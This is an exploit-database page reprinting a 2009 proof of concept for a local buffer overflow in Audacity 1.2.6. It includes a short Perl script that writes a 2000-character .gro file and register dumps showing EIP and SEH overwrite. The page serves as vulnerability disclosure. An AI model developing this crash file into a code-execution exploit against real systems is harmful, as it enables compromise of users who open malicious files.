header-logo
Suggest Exploit
vendor:
Audacity
by:
Houssamix
7.8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Audacity
Affected Version From: 1.2.2006
Affected Version To: 1.2.2006
Patch Exists: YES
Related CWE: N/A
CPE: audacity
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Audacity 1.2.6 (.gro file ) Local buffer overflow POC

When a .gro file containing long Chars is imported in Audacity 1.2.6, the program will crash and the EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI and EIP registers will be overwritten. This can be exploited to execute arbitrary code by creating a malicious .gro file and importing it in Audacity.

Mitigation:

Update to the latest version of Audacity.
Source

Exploit-DB raw data:

# -----------------------------------------------------------
#  Author : Houssamix
# -----------------------------------------------------------

# Audacity 1.2.6  (.gro file ) Local buffer overflow POC

# download : http://audacity.sourceforge.net/
# Audacity® is free, open source software for recording and editing sounds.

# Description:
# When we select : project > import midi..   and we import ".gro" file contains long Chars
# The Program Will crash and The Following Happen:

# EAX:05050504  ECX:01414141  EDX:01520608  EBX:0012F154
# ESP:0012EF10  EBP:00000000  ESI:41414141  EDI:00000000
# EIP:006AEC54 audacity.006AEC54

# Access violation When Reading [41414141]
# And Also The Pointer to next SEH record and SE Handler Will gonna BE Over-wrote
 
# Poc  : 
# -------------------------------------------------------- 

#!/usr/bin/perl
#[*] Bug : Audacity 1.2.6  (.gro file ) Local buffer overflow
use warnings;
use strict;
my $chars   = "\x41" x 2000 ;
my $file="hsmx.gro";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created . import it in audacity  \n";


# ----------------------------------------------------------

# milw0rm.com [2009-01-01]

Navigation

Suggest Exploit

Services By CQR